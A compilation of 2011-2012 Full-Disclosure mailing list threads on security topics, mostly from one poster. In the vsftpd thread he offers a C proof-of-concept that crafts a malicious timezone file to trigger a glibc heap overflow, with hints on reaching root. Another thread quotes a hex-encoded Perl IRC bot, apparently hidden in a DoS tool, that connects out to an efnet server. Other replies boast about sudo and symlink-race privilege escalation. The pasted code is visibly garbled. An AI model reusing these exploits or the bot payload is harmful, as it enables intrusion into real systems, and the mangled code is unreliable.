Thanks mike, i use the old p0f, from freebsd ports collection so maybe time to checkout this new one eh :) thx MZ. drew On 17 January 2012 09:10, Michal Zalewski lcam...@coredump.cx wrote: So just for the record, version 3.00 is now officially out: http://lcamtuf.coredump.cx/p03/. Many thanks to countless people who submitted signatures and bug fixes, including: Phil Ames Jason DePriest Dalibor Dukic Mark Martinec Damien Miller Nibbler Bernhard Rabe Chris John Riley Sebastian Roschke Peter Valchev Jeff Weisberg I won't be spamming the list with any further updates on p0f, but this being a major rewrite after ~6 years, I thought it makes sense to let people know - especially since the previous version is used in quite a few abuse detection / monitoring / pentesting frameworks. /mz ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)
There is, an exploit for this.. if you look around... it also,
works...and, u do have the src... i will pastebin it, just to makesure
no one cries :s
#include stdio.h
#include stdint.h
#include time.h
#include string.h
#define TZ_MAGICTZif
#define PUT_32BIT_MSB(cp, value)\
do {\
(cp)[0] = (value) 24;\
(cp)[1] = (value) 16;\
(cp)[2] = (value) 8; \
(cp)[3] = (value); \
} while (0)
struct tzhead {
chartzh_magic[4];
chartzh_version[1];
chartzh_reserved[15];
chartzh_ttisgmtcnt[4];
chartzh_ttisstdcnt[4];
chartzh_leapcnt[4];
chartzh_timecnt[4];
chartzh_typecnt[4];
chartzh_charcnt[4];
};
struct ttinfo {
long int offset;
unsigned char isdst;
unsigned char idx;
unsigned char isstd;
unsigned char isgmt;
};
int main(void) {
struct tzhead evil;
int i;
char *p;
uint32_t total_size;
uint32_t evil1, evil2;
memcpy(evil.tzh_magic, TZ_MAGIC, sizeof(TZ_MAGIC) - 1);
evil.tzh_version[0] = 0;
memset(evil.tzh_reserved, 0, sizeof(evil.tzh_reserved));
memset(evil.tzh_ttisgmtcnt, 0, sizeof(evil.tzh_ttisgmtcnt));
memset(evil.tzh_ttisstdcnt, 0, sizeof(evil.tzh_ttisstdcnt));
memset(evil.tzh_leapcnt, 0, sizeof(evil.tzh_leapcnt));
memset(evil.tzh_typecnt, 0, sizeof(evil.tzh_typecnt));
evil1 = 500;
PUT_32BIT_MSB(evil.tzh_timecnt, evil1);
total_size = evil1 * (sizeof(time_t) + 1);
total_size = ((total_size + __alignof__ (struct ttinfo) - 1)
~(__alignof__ (struct ttinfo) - 1));
evil2 = 0 - total_size;
PUT_32BIT_MSB(evil.tzh_charcnt, evil2);
p = (char *)evil;
for (i = 0; i sizeof(evil); i++)
printf(%c, p[i]);
putenv(TZ=`pwd`/%s,evil);
for (i = 0; i 5; i++)
//printf([+] Got root ..\n);
printf(A);
}
Sorry but, i did remove the exec line and setuid but, also you must
setend TX=/path/to/nice/shell ,and then you might get somewhere... it
is tricky, as there is the setenv, wichcan be done, i have made that
happen, but, it takes anopther .c file for this... but, i did also,
modify this original one by someone else, wich, only prints...the
overflow and trigger./.but, to get root, you must play with bash
alittle...but yea, it is verymuch also a propblem, anyhow, i was
recently involved with tzdata patch, and, i had reported bugs goin
back ages... anyhow, thx to dividead for his Timezone stuff... but, it
is tricky one..but, very good :P , like, if setup similar to a
sendpage socket to socket, you may be able to send shellcode, to
unset/setenv TZ= , so then it can exec, but, unless it calls that
before adding setuid(0); etc... it wont work on prolly, anything...
dividead made a grat post on it but, i have already hinted at bugs in
glib b4, guess, i dont like to give away, what kids dont need...
anyhow this is working buffer overflow for that CVE exactly.
have fucking fun assholes ./rant
On 10 December 2011 10:47, HI-TECH .
isowarez.isowarez.isowa...@googlemail.com wrote:
-- Weitergeleitete Nachricht --
Von: HI-TECH . isowarez.isowarez.isowa...@googlemail.com
Datum: 10. Dezember 2011 00:44
Betreff: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity)
An: Ramon de C Valle rcva...@redhat.com
Hi Ramon,
Frankly I didn't look into the possibility to exploit this vulnerability,
so i do not know if it is easy or hard to exploit. As you outlined
it is difficult, during your audit you did not manage to trigger a
function pointer call? : i guess not
I am not much into exploiting heap based overruns in the old times fashion.
BTW both freebsd and pure-ftpd load locale files (strace it and you
will see) from /usr,
these locale files are used for the ftp responses to make them written
in international language.
FreeBSD ftpd in junction with the locale files loading will SIGSEGV
(EIP overwrite)
due to a strcpy in locale responses in a special codepath. I did not
find a way to exploit Pure-FTPD through this
locale loading tough, because Pure-FTPD is very restrictive in many ways even
on response lines but there might be a vuln there too. (I dont
remember if locale loading was only
on FreeBSD or also on Linux or also in vsftpd, since the libc behaves
very different in BSD/glibc/eglibc etc)
Regards,
Kingcope
Am 9. Dezember 2011 19:32 schrieb Ramon de C Valle rcva...@redhat.com:
This is afaik a patched CVE in Linux glibc [1] which can be triggered
through
the very secure ftp daemon [2] so it will only work on older linux distros.
Be aware that vsftpd has privilege seperation built in so this bug
will not yield a root shell.
It
Re: [Full-disclosure] Fwd: VSFTPD Remote Heap Overrun (low severity)
http://dividead.wordpress.com/tag/heap-overflow/ oh wow, amazing, someone has already posted but, anyhow, the things explained, here...and yes, if it overflows then ofc it can lead to possible root fucuall fd /XD On 10 December 2011 10:47, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote: -- Weitergeleitete Nachricht -- Von: HI-TECH . isowarez.isowarez.isowa...@googlemail.com Datum: 10. Dezember 2011 00:44 Betreff: Re: [Full-disclosure] VSFTPD Remote Heap Overrun (low severity) An: Ramon de C Valle rcva...@redhat.com Hi Ramon, Frankly I didn't look into the possibility to exploit this vulnerability, so i do not know if it is easy or hard to exploit. As you outlined it is difficult, during your audit you did not manage to trigger a function pointer call? : i guess not I am not much into exploiting heap based overruns in the old times fashion. BTW both freebsd and pure-ftpd load locale files (strace it and you will see) from /usr, these locale files are used for the ftp responses to make them written in international language. FreeBSD ftpd in junction with the locale files loading will SIGSEGV (EIP overwrite) due to a strcpy in locale responses in a special codepath. I did not find a way to exploit Pure-FTPD through this locale loading tough, because Pure-FTPD is very restrictive in many ways even on response lines but there might be a vuln there too. (I dont remember if locale loading was only on FreeBSD or also on Linux or also in vsftpd, since the libc behaves very different in BSD/glibc/eglibc etc) Regards, Kingcope Am 9. Dezember 2011 19:32 schrieb Ramon de C Valle rcva...@redhat.com: This is afaik a patched CVE in Linux glibc [1] which can be triggered through the very secure ftp daemon [2] so it will only work on older linux distros. Be aware that vsftpd has privilege seperation built in so this bug will not yield a root shell. It could yield root only in junction with a linux kernel vulnerability because the attacker will not be able to break the chroot without being root. This bug has a low severity because it's hard to exploit. Linux systems without patched glibc are vulnerable even if the latest version vsftpd-2.3.4 is installed. The bug is in the glibc timezone code. vsftpd loads timezone files from /usr [3]. If the attacker is inside a chroot he can easily create this directory and the timezone file and trigger the heap overrun. A Debugging Session illustrating the bug can be found on youtube: http://www.youtube.com/watch?v=KRCuozBM_dQ I did a brief analysis of this issue. And it seems vsftpd does not add anything to this as an attack vector. Althought we can control the size of the chunk to be allocated (i.e. transitions), and can arbitrarily allocate this chunk from fast bins, the main arena, or eventually, a new mmap()'ed heap. We do not have any control over when its adjacent chunks are allocated, freed, the type of their contents, when they will be used, how they will be used, and if they will be used and useful at all. In addition, the data used to overflow (i.e. transition times) are read and decoded as 4-byte integers in network (big-endian) byte order, which increases the difficulty in faking any structure, such as the adjacent allocated chunk to, at least, get outside of glibc scope after the overflow--since all return paths from __tzfile_read frees our controlled previously allocated chunk. Do you or anyone know a way to potentially exploit this vulnerability? Cheers! Thanks, [1] http://dividead.wordpress.com/tag/heap-overflow/ [2] https://security.appspot.com/vsftpd.html [3] For example /usr/share/zoneinfo/UTC-01:00 /Kingcope -- Ramon de C Valle / Red Hat Security Response Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] PenTest mag
Well, it does force a registration, even for the teasers, thats rude, but yes, it does have a teaser for each issue.. still, is FD the place for these things, i dont know.. On 8 December 2011 07:51, Gage Bystrom themadichi...@gmail.com wrote: I didn't actually bother to get the teaser but I have to ask, was the free content in the teaser 23 pages? If it is, then they weren't misleading in the email. Otherwise, they are being rude. On Dec 7, 2011 12:46 PM, xD 0x41 sec...@gmail.com wrote: umm, its not misleading atall.. this is the first look and, i understood well, if you bother to visit the address... theyre 'teasers' so, you dont get a FULL magazine or, kit, you opnly get the first like chapter/pages, thats similar to many other *products* , not freebies... On 8 December 2011 07:45, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 07/12/2011 10:02, Olga Głowala wrote: New issue of PenTest StarterKit is out! 23 pages of free content, feat. Gabriel Marcos - When computer Attacks The link to download is below: http://pentestmag.com/pentest-starterkit-211-2/http://pentestmag.com/client-side-exploits-pentest-082011/ Just scroll down and click download for free! Quote: Follow the steps below to download the magazine: Register, accept the Disclaimer and choose subscription option. Attention! By choosing the Free Account option you will only be able to download the teaser of each issue. Verify your account using the verification link sent to your email address. Check the password sent on your email address and use it to log in. Click the download button to get the issue. It isn't free. For the price of an email address one can get a teaser of the full 23 page content. It costs at least $220.40 for full copy. Your post is misleading to say the least. -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTt/QYLIvn8UFHWSmAQIzFggAnxvnG44EGxYO/cJ6lG5da8F8vlc5iMgr l+BL7VvtBklGZ8U2kzV2Rg61dWEJfBKv0qR/uqVMv1tQsj+ssfFp4ZmKRoPAjWXi V3fx1ejfxeeVxazOOHB9hi9w0L5CwR85/WWgqzdbjaN6A5odeWCnM5BMzp0nIlQX +sESl0nu/4XXBWRDW+7OeRsuOgeoiaJLagCvXy6gFqObaEjesx5A+qaq7zBbRrWJ Im77mRdSAt9N0oCWs9dlgB0bzv3Fjxo64jUCiiebt4im6bVyR646pkp8DSL7Zndc D+Ar+E7HecmdtBU7Ywnx5dxDuCu9h1V4lJ46Khxe7nBk+i5w3gg7/A== =gt1t -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
Very true... most hashes like, 'lol' and such, are usually around, 12345 is, all the main weak ones are google'able... I do like people like openwall.com, BUT, they do A. contribute BACK to community through owl linux, and, provide lists free, you can optionally buy 700megs for about 20bux, I know i did buy theyre cd, so im guilty of supporting owlOS , and tho, we are also speaking 700megs, and access to gigabytes of lists here... 4bux for 20megs is a joke :P On 3 December 2011 06:14, Jeffrey Walton noloa...@gmail.com wrote: On Thu, Dec 1, 2011 at 10:59 PM, Sanguinarious Rose sanguiner...@occultusterra.com wrote: I am at a lack of words for this, why pay $4.99 when you can just do some simple googling? You can even search pastebin and get a mass collection of password lists from dbases. Add a dash of awk and maybe a pinch of sed and viola! Why even spend the CPU cycles to process the password list? See Jon Callas' post on the Random Bits mailing list: No one bothers cracking the crypto (real life edition), http://lists.randombit.net/pipermail/cryptography/2011-December/001870.html. Interestingly (sadly?), googling the hash worked quite well for me on a number of test cases, including common words and proper names. Jeff ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
dude, you have GOT to be kidding. I can exploit Ubuntu 2011 server and client about 10 ways, and probably same with half this list, it is INDED entry level, or, just stop handding it out on magazines with how to use ubuntu! Move to easy linux now! promos, and then your words have merit. On 19 November 2011 18:14, root ro...@fibertel.com.ar wrote: On 11/18/2011 11:01 AM, Darren Martyn wrote: To be honest, while Ubuntu is hardly secure, it is not DESIGNED to be secure per se. It is designed to wean Windows users away from M$ and toward GNU/Linux OS types. Kind of a Linux for newbs. My family went from Win XP to Ubuntu years ago and stuck with it. I moved on to Debian, they stuck to Ubuntu and Win7 (eventually) as they are not computer enthusiasts - mere users. Bullshit, Ubuntu is designed (or at least, was designed) to be very secure, check all the stuff it comes by default: https://wiki.ubuntu.com/Security/Features Not even the default Debian kernel has all those features activated. If I'm wrong, why you see metasploit modules for Debian but not for Ubuntu? that's the reason. Recently some stupid people got into management (as always happens) and we have things like unity, the fucked up 24-bit ASLR in i386, and this guest account for retards. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
Recently some stupid people got into management (as always happens) Oh here your right, but you still can relent, just dont fucking use the os wich sucks, i have learnt that this suually dictates how an os gets put tyogether... or no tajke some lessons out of windows even,. but do it smarter... idc, id never put ubuntu on a prod, OR local box, It got me once with the APC mags promo about how cl ubu is, then i found there is only about 100 bad binarys, your almost there now, only 30 or so togo! almost patched dude! tyhe biggest laugh is, your main binary wich is simplest, is vulnerable to suid attack... i guess some people would know this method, and know what i am talking about.. if not badluck. Now, adding in a known MS flawed user... well, whats stopping it from taking out lamest fucking os of year award... nothing. clean management, and clean your 3rd party addons, then ill maybe consider even using it partially again. It sucks, simple, gimme user ax to your ubuntu, so i can rape it. thx :) On 19 November 2011 18:14, root ro...@fibertel.com.ar wrote: On 11/18/2011 11:01 AM, Darren Martyn wrote: To be honest, while Ubuntu is hardly secure, it is not DESIGNED to be secure per se. It is designed to wean Windows users away from M$ and toward GNU/Linux OS types. Kind of a Linux for newbs. My family went from Win XP to Ubuntu years ago and stuck with it. I moved on to Debian, they stuck to Ubuntu and Win7 (eventually) as they are not computer enthusiasts - mere users. Bullshit, Ubuntu is designed (or at least, was designed) to be very secure, check all the stuff it comes by default: https://wiki.ubuntu.com/Security/Features Not even the default Debian kernel has all those features activated. If I'm wrong, why you see metasploit modules for Debian but not for Ubuntu? that's the reason. Recently some stupid people got into management (as always happens) and we have things like unity, the fucked up 24-bit ASLR in i386, and this guest account for retards. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
very good question, when i have seen bugs in sudo, wich allow me to gain root, using sudo su - ,wich is a feature but, if not protected and you have a bad sudo binary 9the sudo -g bug was about time i did tests with the amazon sudo) .. i asked a friend also to do this test and he also gained root thru a non sudo account, because BOTH binarys are there i am still baffled with this, i try avoid sudo where i can and, because sudo -g bug was nasty, i try use su - ,wich is abit better i 8think* , but very good question,... id like to know this reasons why to.. On 20 November 2011 06:36, Dan Kaminsky d...@doxpara.com wrote: What is the security differential between su and sudo bash? Sent from my iPhone On Nov 19, 2011, at 6:15 AM, ja...@zero-internet.org.uk wrote: I'll second that; the isp I work at has a sizeable ubuntu customer base and these are customers who have made an informed decision. Now; let's consider ubuntu's inherited security from debian such as configuring a 'mortal account' (admittedly can be ignored in the preseed) and then the lack of perms on su; must use sudo. This is a distro that is newbie friendly but is not designed specifically for them. Unfortunately, though, you make a distro with simplified tasks (printer installation a fantastic example) and people, especially long term linuxers- though I ought to be included I guess, remember back all too easily to when everything was an uphill struggle: what do you mean I don't have to compile this as a flipping module? That's not freedom! Being all too familiar. Just my tuppence worth anyway. Sent from my BlackBerry® wireless device -Original Message- From: Johan Nestaas johannest...@gmail.com Sender: full-disclosure-boun...@lists.grok.org.uk Date: Fri, 18 Nov 2011 12:04:46 To: Olivierfeui...@bibibox.fr Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Ubuntu 11.10 now unsecure by default
yea, id also like to see how on earth Valdis calls this some kinda new 'root' problem... i dont see any problem with this, specially on THIS type of system.. intended to teach people how to use Linux. On 19 November 2011 06:32, Olivier feui...@bibibox.fr wrote: On 11/18/2011 03:10 PM, Dan Kaminsky wrote: On Fri, Nov 18, 2011 at 5:01 AM, valdis.kletni...@vt.edu mailto:valdis.kletni...@vt.edu wrote: On Thu, 17 Nov 2011 15:53:41 CST, C de-Avillez said: There is no guest account on an Ubuntu server, so at least there this is not a real/perceived risk. And nobody's *ever* installed the desktop version on a server because they didn't know any better, especially from Ubuntu's target audience. Gotcha. ;) OK, seriously. If you're sitting in front of a machine that's presenting you a login prompt, you've got enough privileges to insert a bootable USB/CD and pull all the data / make yourself an account (FDE/Bios PW notwithstanding). My disk is password protected, and the whole system (except /boot) is encrypted. Ubuntu guest account is definitively the best way to hack a running laptop (or workstation). -- Olivier ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Secunia jumps on vuln reward bandwagon
Well, no comment, or comment its hard to comment on this one :P Although, i will say it is good and encouraging to see more security teams atleast offering *something* :) love the list...oh yea baby oh yea On 4 November 2011 01:25, Georgi Guninski gunin...@guninski.com wrote: http://www.theregister.co.uk/2011/11/02/secunia_vulnerability_rewards/ Secunia jumps on vuln reward bandwagon have in mind the list is Hosted and sponsored by Secunia -- j ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [foofus-tools] discontinued?
naw we fuckin hate windows it sucks. On 27 October 2011 19:20, Kristen Eisenberg kristen.eisenb...@yahoo.com wrote: Hi guys, well first of all thanx for building a tool like fgdump :) but i'm worried, since 2k8 there is no update and it would be very sad if it's discontinued... are you planning another release? Kristen Eisenberg Billige Flüge Marketing GmbH Emanuelstr. 3, 10317 Berlin Deutschland Telefon: +49 (33) 5310967 Email: utebachmeier at gmail.com Site: http://flug.airego.de - Billige Flüge vergleichen ___ foofus-tools mailing list foofus-to...@lists.foofus.net http://lists.foofus.net/listinfo.cgi/foofus-tools-foofus.net ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Symlink vulnerabilities
Yes... even adding a cron entry is possible if done right ;) On 28 October 2011 04:51, valdis.kletni...@vt.edu wrote: On Thu, 27 Oct 2011 10:31:12 PDT, Andrew Farmer said: And systems like inotify make filesystem races trivial to win. I wouldn't be surprised if you could win this particular race reliably by watching for the files bzexe drops and acting immediately when they show up. Good point. That actually has multiple benefits - first off, you don't have a 'while (1)' loop in your code that's easily spotted on a 'ps' or 'top'. So you can afford to set the inotify and wait (potentially days, if needed) with less chance of detection. And then when the inotify pops and tells you your file is ready to be exploited, the circumstances of returning from the blocked syscall will tend to give your process a scheduling boost, improving your chances of winning the race because you'll schedule soon. It's amazing how many optimizations people are coming up for a vulnerability that some were saying is impossible to exploit. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I know its old, but what the heck does this do... (exposing a tool...)
Ok... am awake now and, have some infos yes... Interesting bot. Seems i have spoken with some people regarding this and the release.Here is a brief outline of how it goes. Attacks were done on some people who run shells on efnet irc network, so in order to catch the *morons8 or, ppl who did launch the DoS would then be showing up in #darknet channel, and responds to the ops or, channel. I ran this and saw it still clobbers smb,and still uses the original bug, so d0s will still occur, however, it will try and join, i believe thats a dead link in there now but, would have tried to join a efnet node.. Speaking with #darknet owners: ok dude why was this released... msg we released the original working code. this started a massive war of the kids, unfortunately many innocent boxes got raped, so we decided to play a small game, and make a *version plus* or so so say. very interesting concept, new, intuitive to use perl, as many people would decrypt it tho, using perl -e , isnt this alittle harsh... msg they run it, it wont affect them, atall, they will see the connection and kill it,and since no D0s is launched, it wont really work hrmm well, it is a good idea, to capture the arseholes who wish to ddos etc... i see why it is done but also, can i ask you do you know what a darknet is ? because, you seem to not see that, ppl would assume this channel is all about 'darknets'.. instead it is only capturing people who will launch a DoS tool,and many people seem 'idle'. msg we dont control who comes here, now care, but when it comes to d0s, we dont scrw about.hit us,and we will hit back. Also, why are you asking me about code wich was made in 2003 or so :P~ ahh well, thats purely because, i expose any BS like this code is, but, i will not mark this as bullshit. it is horseshit :P and, i respect that your at the least, using some shitty tool like d0s, instead of faking an exploit. I will class this not as exposed atall, instead, it will serve as some form of tuition to skids. Run the tools you cannot read, and, expect even some shitty perlbot to pop out. I like it! I will class this as exposed but intuitive, thankyou for your time. msg i dont care what you mark it as, the rule is simple, do not run d0s ./appz ! Have a nice day! Again thanks for your time, i will keep the nickname anonymous... your not classed as a now-owner , so i guess it is more wtf this was all about, even when you wrote the .c or, as i know it, was 'brain' or some dude... either way, i tip the black hat to you but also warn you not always will them kids be happy to be owned by shitty .c , so, id be expecting more problems from release, than not This is your problem, and, i respect your views, just get some knowledge into you about wtf a 'darknet' is prompto! Also have a nice day. .. Ok so, basically the talk i had with a now non op of channel but, interesting coz, it is actually very popular, yet only a few actually realise that theyre being linked now to a darknet technology app etc, and theyre finding that maybe they should have kept those old ops :P or maybe they could just release 'ipv6killer.c' and just fix some settings..eitherway, it is kinda unique, and strange why there was no chat about this app, until now.. nothing solid wich shows this perl, and admittedly, thats a VERY clever bot for such a small piece of code. Anyhow, thanks to those who found this interesting, sorry to those who didnt :) I think i might hang in darknet channel and wait for a few Hi im a lamer! etc... rofl. cheers, and cheers to #darknet for atleast not faking the tool completely, and, using a skeleton and structure of theyre OWN code. Winnuke2000.c is NOT backdoored, and IS theyres also, I think they regret releasing it now but, this was 2003, and, as i said, i will try and expose anything i find strange, however, from now on, ill be marking exposes under noise, as theyre non disclosures. xd On 26 October 2011 16:55, Flavio do Carmo Junior carmo.fla...@gmail.comwrote: sounds really useful... [waKKu@1215n ~]$ python -c 'hellcode=( \x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63 \x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69 \x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72 \x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e \x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65 \x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f \x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49 \x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e \x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22 \x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63 \x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d
Re: [Full-disclosure] Security risks in public APIs?
My own thoughts is, aslong as FaceBook continues to live, there will always be that million people who will not bother to worry, because afterall, its not theyre website, so, why even bother to use a secure api... if you know your security enough then, it is a well known target for any attack and will continue to be attacked aslong as it stays big, it is a source of easily gotten robots through spam and yes, bad links etc within facebook. I know with myspace, it was nonstop worms and these worms were darn good, using trick flash plugin exact pages to do theyre bidding to view a friends page' this kind of attacking and attacks wil always happen, so, the security info is great for some but, really if you keep things *small* and monitor who you add to the list of friends, you should never be *owned8 , then again, there will always exist the better social engineers. I will conclude by saying, i dont have any facebook account, i have only monitored what i have watched happen, over and over it seems with facebook, and continues to have undisclosed bugs in the app, so, i dont think any use of it is secure, certainly not for minors, certainly not if your on some production box and using it either.. thatd be silly. my own thoughts and my own opinions, as you asked for. This little birdy says NO to FB :-( xdab On 27 October 2011 08:42, Adam Behnke a...@infosecinstitute.com wrote: Hello full disclosurites, what do you think about security in public APIs? ** ** Dan Morrill here at InfoSec Institute writes about how to insecurely and securely use APIs in the Facebook SDK: ** ** http://resources.infosecinstitute.com/api-security/ ** ** Your thoughts? ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Bypassing Windows 7 kernel ASLR
Thats cool... id like to see more about using rop chains or other methods to bypass dep+aslr in one go... rather than just take out one protection.. pretty nice read..cheers xd 2011/10/12 Stéfan LE BERRE slebe...@nes.fr Hi ! ** ** I have recently discovered a method to bypass Windows 7 kernel ASLR. You can find the paper here: http://www.nes.fr/docs/NES-BypassWin7KernelAslr.pdf ** ** In this paper I explain every step to code an exploit with an useful kernel ASLR bypassing. I perform successful exploitations on Windows 7 SP0 / SP1. ** ** Good reading, ** ** Best regards, ** ** LE BERRE Stefan. IT Security Researcher NES http://www.nes.fr – http://ww.nes.fr/securitylab/ 46 rue de provence 75009 PARIS ** ** ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wipe off, rub out, reappear...
Oh, whoever has made this .exe is NO idiot... I can already see that for this bug to be readding itself, there must be active servers obviously, wich would have the bots connected for command, dumping of infos to other channels by using say !pstore get *rover-*|grep *mars*transmission-request-FIN* -o #roverlogging This is possible.. using just an if/else Logic system (as seen in Forbot/phatbot, and a few underground ones like stuxnet...0 xd On 11 October 2011 10:41, Dave m...@propergander.org.uk wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 10/10/2011 23:52, xD 0x41 wrote: I will say, with Botnets, and bots in general, i dont see much talented people on FD... It might just be a case of those with the least talent making the most noise, whilst the really talented remain pretty quiet. Please discuss ;-) although, seems many can decrypt them, so, makes me wonder , it is a train-of-thought also, i guess this is where hat colors take control.. black hats would say, go read some bot src and wake up FD, while white hats would say, but we can just kill it anyhow...' oh, we decrypted it... etc... another pintless neverneding arguement.. As for this story I would expect such systems to engineered and administered by someone with a clue even if the operators know no more than what buttons to press. On 11 October 2011 07:22, Daniel Sichel dani...@ponderosatel.com wrote: Somebody posted the following; I'm just curious to these questions. It's strange to hear someone saying we basically have no idea what's going on. Doesn't sound funny to me, happens to me all the time. That's how I learn. Dan S. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQEVAwUBTpOCkLIvn8UFHWSmAQKEgQf+L9Cvl2sdHvw6EFhIruKd5ZPmJ9woGolB LX/hdWsPKuYFGYiiPthKTs4M/m6HTEY1fSc4KRWncpgcvCQ4iNvCE2UWDSvyrvmm 3x0J2/OjndBoAWd4gI+QaELXiwaaWMAtTQwKQPPCzIP1DEvYDMY76Ml9ga5uO0Ew haoMYjQS/K+Bd6jTRDO9bzJHtKQWP+06jFr/FrX4+AtBHbSM9vqJ57JQjbo9U8H6 Bdkoxtc8E3njPHasmO2UF96FyIE5OW42F8xpu0gi07uOwWKAreGB9UEJx0prVkwi BZruBLv5NunJw5wp28DkvKRfPgfRp697TYje1IuyNlgpwKX3nI2oXA== =SCl5 -END PGP SIGNATURE- ___ 